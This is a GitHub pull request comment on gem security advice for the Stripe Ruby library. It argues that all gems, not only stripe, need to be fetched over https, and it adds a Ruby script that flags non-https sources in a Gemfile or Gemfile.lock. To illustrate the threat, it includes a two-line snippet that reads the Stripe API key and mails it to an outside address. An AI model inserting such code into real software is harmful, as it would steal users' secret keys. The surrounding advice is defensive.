Update gem security advice #63
Requesting stripe gems over https doesn't help you if the other gems in your system (e.g. rails) are fetched over http - a MITM attacker could corrupt any gem fetched over http to compromise the stripe code.
For example, if I was an evil attacker, even if you fetched the stripe gem securely, if you fetched rails over HTTP, I could alter the rails gem to include the code:
```ruby
key = Stripe.api_key
mail to: "firstname.lastname@example.org", subject: "Someone's secret key", body: key
```
The only way to ensure gem security against a MITM attacker is to ensure all gems are fetched over https, not just some of them.
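One way to check for the problem the PR describes is to audit every gem source an application declares, not just the stripe one. The following is an added example (not code from the PR or from stripe-ruby) that scans `source` lines in a Gemfile and `remote:` lines in a Gemfile.lock and reports any source that is not fetched over https; the sample Gemfile and lock contents are constructed.

```ruby
require 'uri'

# Collect gem source URLs from Gemfile text (`source '...'` lines) and
# Gemfile.lock text (`remote: ...` lines under a GEM section).
def gem_sources(text)
  text.each_line.flat_map do |line|
    case line.strip
    when /\Asource\s+['"]([^'"]+)['"]/ then [$1] # Gemfile:      source 'https://rubygems.org'
    when /\Aremote:\s+(\S+)/           then [$1] # Gemfile.lock: remote: https://rubygems.org/
    else []
    end
  end
end

# Return the sources an on-path attacker could tamper with: anything whose
# scheme is not https (plain http, or an unparsable URL).
def insecure_sources(text)
  gem_sources(text).reject do |src|
    URI.parse(src).scheme == 'https' rescue false
  end
end

# Constructed sample: the global source is http even though the lock file
# shows stripe itself coming from an https remote. Every gem pulled from the
# http source (here rails) can be modified in transit, which is the PR's point.
SAMPLE_GEMFILE = <<~GEMFILE
  source 'http://rubygems.org'
  gem 'rails'
  gem 'stripe'
GEMFILE

SAMPLE_LOCK = <<~LOCK
  GEM
    remote: http://rubygems.org/
    specs:
      rails (0.0.0)
  GEM
    remote: https://rubygems.org/
    specs:
      stripe (0.0.0)
LOCK

if __FILE__ == $0
  [['Gemfile', SAMPLE_GEMFILE], ['Gemfile.lock', SAMPLE_LOCK]].each do |name, text|
    bad = insecure_sources(text)
    puts bad.empty? ? "#{name}: all sources use https" : "#{name}: insecure sources #{bad.inspect}"
  end
end
```

Running it against a real project (`insecure_sources(File.read('Gemfile.lock'))`) flags every remote that still needs to be switched to https.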